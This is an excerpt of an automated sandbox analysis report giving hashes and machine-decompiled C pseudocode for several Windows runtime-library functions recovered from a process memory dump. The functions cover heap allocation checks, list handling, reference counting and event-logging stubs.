              • Instruction ID: b5b58827807aed45be8e37db037dff888091d0bfa4138f592f93c82f1cbd3da9
              • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
              • Instruction Fuzzy Hash: A8110272504208BBDB059F5DD8809BEB7B9EF85304F1080AAF94487350DA319D55D7A4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 94%
              			E04BD766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
              				char _v8;
              				void* _t22;
              				void* _t24;
              				intOrPtr _t29;
              				intOrPtr* _t30;
              				void* _t42;
              				intOrPtr _t47;
              
              				_push(__ecx);
              				_t36 =  &_v8;
              				if(E04BFF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
              					L10:
              					_t22 = 0;
              				} else {
              					_t24 = _v8 + __ecx;
              					_t42 = _t24;
              					if(_t24 < __ecx) {
              						goto L10;
              					} else {
              						if(E04BFF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
              							goto L10;
              						} else {
              							_t29 = _v8 + _t42;
              							if(_t29 < _t42) {
              								goto L10;
              							} else {
              								_t47 = _t29;
              								_t30 = _a16;
              								if(_t30 != 0) {
              									 *_t30 = _t47;
              								}
              								if(_t47 == 0) {
              									goto L10;
              								} else {
              									_t22 = L04BE4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
              								}
              							}
              						}
              					}
              				}
              				return _t22;
              			}











              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
              • Instruction ID: 75ca9fa3e795380294b2f96e773075273cc89765863456bc816c304f7852f6cf
              • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
              • Instruction Fuzzy Hash: DE018432700119AFD720AE5EDC41EAB77ADEB84B60B2405E9B91CCB250FE30ED0197A0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 69%
              			E04BC9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
              				intOrPtr* _t51;
              				intOrPtr _t59;
              				signed int _t64;
              				signed int _t67;
              				signed int* _t71;
              				signed int _t74;
              				signed int _t77;
              				signed int _t82;
              				intOrPtr* _t84;
              				void* _t85;
              				intOrPtr* _t87;
              				void* _t94;
              				signed int _t95;
              				intOrPtr* _t97;
              				signed int _t99;
              				signed int _t102;
              				void* _t104;
              
              				_push(__ebx);
              				_push(__esi);
              				_push(__edi);
              				_t97 = __ecx;
              				_t102 =  *(__ecx + 0x14);
              				if((_t102 & 0x02ffffff) == 0x2000000) {
              					_t102 = _t102 | 0x000007d0;
              				}
              				_t48 =  *[fs:0x30];
              				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
              					_t102 = _t102 & 0xff000000;
              				}
              				_t80 = 0x4cb85ec;
              				E04BE2280(_t48, 0x4cb85ec);
              				_t51 =  *_t97 + 8;
              				if( *_t51 != 0) {
              					L6:
              					return E04BDFFB0(_t80, _t97, _t80);
              				} else {
              					 *(_t97 + 0x14) = _t102;
              					_t84 =  *0x4cb538c; // 0x774968c8
              					if( *_t84 != 0x4cb5388) {
              						_t85 = 3;
              						asm("int 0x29");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						asm("int3");
              						_push(0x2c);
              						_push(0x4c9f6e8);
              						E04C1D0E8(0x4cb85ec, _t97, _t102);
              						 *((char*)(_t104 - 0x1d)) = 0;
              						_t99 =  *(_t104 + 8);
              						__eflags = _t99;
              						if(_t99 == 0) {
              							L13:
              							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
              							if(__eflags == 0) {
              								E04C988F5(_t80, _t85, 0x4cb5388, _t99, _t102, __eflags);
              							}
              						} else {
              							__eflags = _t99 -  *0x4cb86c0; // 0x31007b0
              							if(__eflags == 0) {
              								goto L13;
              							} else {
              								__eflags = _t99 -  *0x4cb86b8; // 0x0
              								if(__eflags == 0) {
              									goto L13;
              								} else {
              									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
              									__eflags =  *((char*)(_t59 + 0x28));
              									if( *((char*)(_t59 + 0x28)) == 0) {
              										E04BE2280(_t99 + 0xe0, _t99 + 0xe0);
              										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
              										__eflags =  *((char*)(_t99 + 0xe5));
              										if(__eflags != 0) {
              											E04C988F5(0x4cb85ec, _t85, 0x4cb5388, _t99, _t102, __eflags);
              										} else {
              											__eflags =  *((char*)(_t99 + 0xe4));
              											if( *((char*)(_t99 + 0xe4)) == 0) {
              												 *((char*)(_t99 + 0xe4)) = 1;
              												_push(_t99);
              												_push( *((intOrPtr*)(_t99 + 0x24)));
              												E04C0AFD0();
              											}
              											while(1) {
              												_t71 = _t99 + 8;
              												 *(_t104 - 0x2c) = _t71;
              												_t80 =  *_t71;
              												_t95 = _t71[1];
              												 *(_t104 - 0x28) = _t80;
              												 *(_t104 - 0x24) = _t95;
              												while(1) {
              													L19:
              													__eflags = _t95;
              													if(_t95 == 0) {
              														break;
              													}
              													_t102 = _t80;
              													 *(_t104 - 0x30) = _t95;
              													 *(_t104 - 0x24) = _t95 - 1;
              													asm("lock cmpxchg8b [edi]");
              													_t80 = _t102;
              													 *(_t104 - 0x28) = _t80;
              													 *(_t104 - 0x24) = _t95;
              													__eflags = _t80 - _t102;
              													_t99 =  *(_t104 + 8);
              													if(_t80 != _t102) {
              														continue;
              													} else {
              														__eflags = _t95 -  *(_t104 - 0x30);
              														if(_t95 !=  *(_t104 - 0x30)) {
              															continue;
              														} else {
              															__eflags = _t95;
              															if(_t95 != 0) {
              																_t74 = 0;
              																 *(_t104 - 0x34) = 0;
              																_t102 = 0;
              																__eflags = 0;
              																while(1) {
              																	 *(_t104 - 0x3c) = _t102;
              																	__eflags = _t102 - 3;
              																	if(_t102 >= 3) {
              																		break;
              																	}
              																	__eflags = _t74;
              																	if(_t74 != 0) {
              																		L49:
              																		_t102 =  *_t74;
              																		__eflags = _t102;
              																		if(_t102 != 0) {
              																			_t102 =  *(_t102 + 4);
              																			__eflags = _t102;
              																			if(_t102 != 0) {
              																				 *0x4cbb1e0(_t74, _t99);
              																				 *_t102();
              																			}
              																		}
              																		do {
              																			_t71 = _t99 + 8;
              																			 *(_t104 - 0x2c) = _t71;
              																			_t80 =  *_t71;
              																			_t95 = _t71[1];
              																			 *(_t104 - 0x28) = _t80;
              																			 *(_t104 - 0x24) = _t95;
              																			goto L19;
              																		} while (_t74 == 0);
              																		goto L49;
              																	} else {
              																		_t82 = 0;
              																		__eflags = 0;
              																		while(1) {
              																			 *(_t104 - 0x38) = _t82;
              																			__eflags = _t82 -  *0x4cb84c0;
              																			if(_t82 >=  *0x4cb84c0) {
              																				break;
              																			}
              																			__eflags = _t74;
              																			if(_t74 == 0) {
              																				_t77 = E04C99063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
              																				__eflags = _t77;
              																				if(_t77 == 0) {
              																					_t74 = 0;
              																					__eflags = 0;
              																				} else {
              																					_t74 = _t77 + 0xfffffff4;
              																				}
              																				 *(_t104 - 0x34) = _t74;
              																				_t82 = _t82 + 1;
              																				continue;
              																			}
              																			break;
              																		}
              																		_t102 = _t102 + 1;
              																		continue;
              																	}
              																	goto L20;
              																}
              																__eflags = _t74;
              															}
              														}
              													}
              													break;
              												}
              												L20:
              												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
              												 *((char*)(_t99 + 0xe5)) = 1;
              												 *((char*)(_t104 - 0x1d)) = 1;
              												goto L21;
              											}
              										}
              										L21:
              										 *(_t104 - 4) = 0xfffffffe;
              										E04BC922A(_t99);
              										_t64 = E04BE7D50();
              										__eflags = _t64;
              										if(_t64 != 0) {
              											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              										} else {
              											_t67 = 0x7ffe0386;
              										}
              										__eflags =  *_t67;
              										if( *_t67 != 0) {
              											_t67 = E04C98B58(_t99);
              										}
              										__eflags =  *((char*)(_t104 - 0x1d));
              										if( *((char*)(_t104 - 0x1d)) != 0) {
              											__eflags = _t99 -  *0x4cb86c0; // 0x31007b0
              											if(__eflags != 0) {
              												__eflags = _t99 -  *0x4cb86b8; // 0x0
              												if(__eflags == 0) {
              													_t94 = 0x4cb86bc;
              													_t87 = 0x4cb86b8;
              													goto L27;
              												} else {
              													__eflags = _t67 | 0xffffffff;
              													asm("lock xadd [edi], eax");
              													if(__eflags == 0) {
              														E04BC9240(_t80, _t99, _t99, _t102, __eflags);
              													}
              												}
              											} else {
              												_t94 = 0x4cb86c4;
              												_t87 = 0x4cb86c0;
              												L27:
              												E04BF9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
              											}
              										}
              									} else {
              										goto L13;
              									}
              								}
              							}
              						}
              						return E04C1D130(_t80, _t99, _t102);
              					} else {
              						 *_t51 = 0x4cb5388;
              						 *((intOrPtr*)(_t51 + 4)) = _t84;
              						 *_t84 = _t51;
              						 *0x4cb538c = _t51;
              						goto L6;
              					}
              				}
              			}





















              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: eee5800505374b22415f59ba8096ff3abfbfe18237d04dc699bd385ec29b76fc
              • Instruction ID: 7da173508261f93142cda33eb21679024d09a93c517453d971d0602295edeca9
              • Opcode Fuzzy Hash: eee5800505374b22415f59ba8096ff3abfbfe18237d04dc699bd385ec29b76fc
              • Instruction Fuzzy Hash: A801A4B26056049FF3199F24D880B2177A9EB85729F2540AAE5059B791D774FC41CBE0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 46%
              			E04C5C450(intOrPtr* _a4) {
              				signed char _t25;
              				intOrPtr* _t26;
              				intOrPtr* _t27;
              
              				_t26 = _a4;
              				_t25 =  *(_t26 + 0x10);
              				if((_t25 & 0x00000003) != 1) {
              					_push(0);
              					_push(0);
              					_push(0);
              					_push( *((intOrPtr*)(_t26 + 8)));
              					_push(0);
              					_push( *_t26);
              					E04C09910();
              					_t25 =  *(_t26 + 0x10);
              				}
              				if((_t25 & 0x00000001) != 0) {
              					_push(4);
              					_t7 = _t26 + 4; // 0x4
              					_t27 = _t7;
              					_push(_t27);
              					_push(5);
              					_push(0xfffffffe);
              					E04C095B0();
              					if( *_t27 != 0) {
              						_push( *_t27);
              						E04C095D0();
              					}
              				}
              				_t8 = _t26 + 0x14; // 0x14
              				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
              					L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
              				}
              				_push( *_t26);
              				E04C095D0();
              				return L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
              			}







              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
              • Instruction ID: 0be757e676a055e717c2c1d7e78f9787bca05e5ff3f03aab64a3a374ab3ec6ab
              • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
              • Instruction Fuzzy Hash: C60180B2140605BFEA25AF66CC80E76BB6EFB54794F008525F514425B0CB31FCA1DAA4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			E04C94015(signed int __eax, signed int __ecx) {
              				void* __ebx;
              				void* __edi;
              				signed char _t10;
              				signed int _t28;
              
              				_push(__ecx);
              				_t28 = __ecx;
              				asm("lock xadd [edi+0x24], eax");
              				_t10 = (__eax | 0xffffffff) - 1;
              				if(_t10 == 0) {
              					_t1 = _t28 + 0x1c; // 0x1e
              					E04BE2280(_t10, _t1);
              					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
              					E04BE2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4cb86ac);
              					E04BCF900(0x4cb86d4, _t28);
              					E04BDFFB0(0x4cb86ac, _t28, 0x4cb86ac);
              					 *((intOrPtr*)(_t28 + 0x20)) = 0;
              					E04BDFFB0(0, _t28, _t1);
              					_t18 =  *((intOrPtr*)(_t28 + 0x94));
              					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
              						L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
              					}
              					_t10 = L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
              				}
              				return _t10;
              			}








              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a2b005491c21de8baf335714d3c875891c0ca1e5a94c6f345bae5728f615e99c
              • Instruction ID: cb6ce3867acd6e17a42e7021b893b12032ccfedf3342be14d1cfdfc2e904edfa
              • Opcode Fuzzy Hash: a2b005491c21de8baf335714d3c875891c0ca1e5a94c6f345bae5728f615e99c
              • Instruction Fuzzy Hash: F101D4722015447FE618AB69CD80E23B7ACEB85658B0006A5B50887A11DB24FC11C6E4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 61%
              			E04C814FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
              				signed int _v8;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				short _v54;
              				char _v60;
              				void* __edi;
              				void* __esi;
              				signed char* _t21;
              				intOrPtr _t27;
              				intOrPtr _t33;
              				intOrPtr _t34;
              				signed int _t35;
              
              				_t32 = __edx;
              				_t27 = __ebx;
              				_v8 =  *0x4cbd360 ^ _t35;
              				_t33 = __edx;
              				_t34 = __ecx;
              				E04C0FA60( &_v60, 0, 0x30);
              				_v20 = _a4;
              				_v16 = _a8;
              				_v28 = _t34;
              				_v24 = _t33;
              				_v54 = 0x1034;
              				if(E04BE7D50() == 0) {
              					_t21 = 0x7ffe0388;
              				} else {
              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
              				}
              				_push( &_v60);
              				_push(0x10);
              				_push(0x20402);
              				_push( *_t21 & 0x000000ff);
              				return E04C0B640(E04C09AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
              			}


















              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f554dbd07edb01d05376ee47cf85f57b4225025b34b044d3739c968a09757cb5
              • Instruction ID: a215b01e898e7d3b04b163a5cae4abe44ad4d34ccafeac6a44010c69ecb13b81
              • Opcode Fuzzy Hash: f554dbd07edb01d05376ee47cf85f57b4225025b34b044d3739c968a09757cb5
              • Instruction Fuzzy Hash: F7019271A00248AFDB14EFA9D841FAEB7B8EF44714F04406AF905EB280DA74EE01DB94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 61%
              			E04C8138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
              				signed int _v8;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				short _v54;
              				char _v60;
              				void* __edi;
              				void* __esi;
              				signed char* _t21;
              				intOrPtr _t27;
              				intOrPtr _t33;
              				intOrPtr _t34;
              				signed int _t35;
              
              				_t32 = __edx;
              				_t27 = __ebx;
              				_v8 =  *0x4cbd360 ^ _t35;
              				_t33 = __edx;
              				_t34 = __ecx;
              				E04C0FA60( &_v60, 0, 0x30);
              				_v20 = _a4;
              				_v16 = _a8;
              				_v28 = _t34;
              				_v24 = _t33;
              				_v54 = 0x1033;
              				if(E04BE7D50() == 0) {
              					_t21 = 0x7ffe0388;
              				} else {
              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
              				}
              				_push( &_v60);
              				_push(0x10);
              				_push(0x20402);
              				_push( *_t21 & 0x000000ff);
              				return E04C0B640(E04C09AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
              			}


















              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 57a76d38d0f290d919502e9a10e3b978e309bb4ad1709d6f00c8abc25f1f9829
              • Instruction ID: bac36906251a5539f93ff081d81b019f7b059620a518e2a9fd2617383c4696af
              • Opcode Fuzzy Hash: 57a76d38d0f290d919502e9a10e3b978e309bb4ad1709d6f00c8abc25f1f9829
              • Instruction Fuzzy Hash: CC015271A00218AFDB14EFA9D841FAEB7B8EF44714F04406AB905EB281EA74EE41D794
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E04BDB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
              				signed char _t11;
              				signed char* _t12;
              				intOrPtr _t24;
              				signed short* _t25;
              
              				_t25 = __edx;
              				_t24 = __ecx;
              				_t11 = ( *[fs:0x30])[0x50];
              				if(_t11 != 0) {
              					if( *_t11 == 0) {
              						goto L1;
              					}
              					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
              					L2:
              					if( *_t12 != 0) {
              						_t12 =  *[fs:0x30];
              						if((_t12[0x240] & 0x00000004) == 0) {
              							goto L3;
              						}
              						if(E04BE7D50() == 0) {
              							_t12 = 0x7ffe0385;
              						} else {
              							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
              						}
              						if(( *_t12 & 0x00000020) == 0) {
              							goto L3;
              						}
              						return E04C47016(_a4, _t24, 0, 0, _t25, 0);
              					}
              					L3:
              					return _t12;
              				}
              				L1:
              				_t12 = 0x7ffe0384;
              				goto L2;
              			}








              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
              • Instruction ID: c2ddaf281e5f54bac4dd7c3bd6b2d082e58660d155a7fab23eec8d558c6b0049
              • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
              • Instruction Fuzzy Hash: FA01BC72205980DFD326CB2DCA88F667BD9EB41B40F0A00E1E919CBA51EB69FD40C220
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E04C91074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
              				char _v8;
              				void* _v11;
              				unsigned int _v12;
              				void* _v15;
              				void* __esi;
              				void* __ebp;
              				char* _t16;
              				signed int* _t35;
              
              				_t22 = __ebx;
              				_t35 = __ecx;
              				_v8 = __edx;
              				_t13 =  !( *__ecx) + 1;
              				_v12 =  !( *__ecx) + 1;
              				if(_a4 != 0) {
              					E04C9165E(__ebx, 0x4cb8ae4, (__edx -  *0x4cb8b04 >> 0x14) + (__edx -  *0x4cb8b04 >> 0x14), __edi, __ecx, (__edx -  *0x4cb8b04 >> 0x14) + (__edx -  *0x4cb8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
              				}
              				E04C8AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
              				if(E04BE7D50() == 0) {
              					_t16 = 0x7ffe0388;
              				} else {
              					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
              				}
              				if( *_t16 != 0) {
              					_t16 = E04C7FE3F(_t22, _t35, _v8, _v12);
              				}
              				return _t16;
              			}












              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 56b66b34db854d916896810211972007854e206518e542ca5c2ce272c1e6fa18
              • Instruction ID: ae5ff646306961cca1a20276fbb8d536482c1cb023bf332c64d90e7b4691f379
              • Opcode Fuzzy Hash: 56b66b34db854d916896810211972007854e206518e542ca5c2ce272c1e6fa18
              • Instruction Fuzzy Hash: 4D012872504742BBEB10EF29C945B1A77DAAB84314F088529F88583290EE31FD50DBA2
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 59%
              			E04C7FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
              				signed int _v12;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				short _v58;
              				char _v64;
              				void* __edi;
              				void* __esi;
              				signed char* _t18;
              				intOrPtr _t24;
              				intOrPtr _t30;
              				intOrPtr _t31;
              				signed int _t32;
              
              				_t29 = __edx;
              				_t24 = __ebx;
              				_v12 =  *0x4cbd360 ^ _t32;
              				_t30 = __edx;
              				_t31 = __ecx;
              				E04C0FA60( &_v64, 0, 0x30);
              				_v24 = _a4;
              				_v32 = _t31;
              				_v28 = _t30;
              				_v58 = 0x266;
              				if(E04BE7D50() == 0) {
              					_t18 = 0x7ffe0388;
              				} else {
              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
              				}
              				_push( &_v64);
              				_push(0x10);
              				_push(0x20402);
              				_push( *_t18 & 0x000000ff);
              				return E04C0B640(E04C09AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
              			}

















              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d1d9de5ab96515d3ba96d9115947d1ae74e296a9adc37bdf9227ffa426069b51
              • Instruction ID: be4b67dd680cc6458c270da72aa836f8f010d79fb450069e81c2e912e0069707
              • Opcode Fuzzy Hash: d1d9de5ab96515d3ba96d9115947d1ae74e296a9adc37bdf9227ffa426069b51
              • Instruction Fuzzy Hash: 44018471E00208ABDB14DBA9D845FAEB7B9EF44714F00406AF901AB281EA74EA01C794
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 59%
              			E04C7FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
              				signed int _v12;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				short _v58;
              				char _v64;
              				void* __edi;
              				void* __esi;
              				signed char* _t18;
              				intOrPtr _t24;
              				intOrPtr _t30;
              				intOrPtr _t31;
              				signed int _t32;
              
              				_t29 = __edx;
              				_t24 = __ebx;
              				_v12 =  *0x4cbd360 ^ _t32;
              				_t30 = __edx;
              				_t31 = __ecx;
              				E04C0FA60( &_v64, 0, 0x30);
              				_v24 = _a4;
              				_v32 = _t31;
              				_v28 = _t30;
              				_v58 = 0x267;
              				if(E04BE7D50() == 0) {
              					_t18 = 0x7ffe0388;
              				} else {
              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
              				}
              				_push( &_v64);
              				_push(0x10);
              				_push(0x20402);
              				_push( *_t18 & 0x000000ff);
              				return E04C0B640(E04C09AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
              			}

















              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 97bab2530643f5c63a3b27c1b41d5333b5cacbfdebea0832aba0306fa1f2273b
              • Instruction ID: 9e20745d4caf1b8c0852277339cc3d9f704ab3e83cb8ccb0cc2b151e90ac8340
              • Opcode Fuzzy Hash: 97bab2530643f5c63a3b27c1b41d5333b5cacbfdebea0832aba0306fa1f2273b
              • Instruction Fuzzy Hash: 14018471E00208ABDB14DFA9D845FAEBBB9EF44714F00806AF900AB281DA74EA01C795
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 54%
              			E04C98ED6(intOrPtr __ecx, intOrPtr __edx) {
              				signed int _v8;
              				signed int _v12;
              				intOrPtr _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				intOrPtr _v36;
              				short _v62;
              				char _v68;
              				signed char* _t29;
              				intOrPtr _t35;
              				intOrPtr _t41;
              				intOrPtr _t42;
              				signed int _t43;
              
              				_t40 = __edx;
              				_v8 =  *0x4cbd360 ^ _t43;
              				_v28 = __ecx;
              				_v62 = 0x1c2a;
              				_v36 =  *((intOrPtr*)(__edx + 0xc8));
              				_v32 =  *((intOrPtr*)(__edx + 0xcc));
              				_v20 =  *((intOrPtr*)(__edx + 0xd8));
              				_v16 =  *((intOrPtr*)(__edx + 0xd4));
              				_v24 = __edx;
              				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
              				if(E04BE7D50() == 0) {
              					_t29 = 0x7ffe0386;
              				} else {
              					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              				}
              				_push( &_v68);
              				_push(0x1c);
              				_push(0x20402);
              				_push( *_t29 & 0x000000ff);
              				return E04C0B640(E04C09AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
              			}



















              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
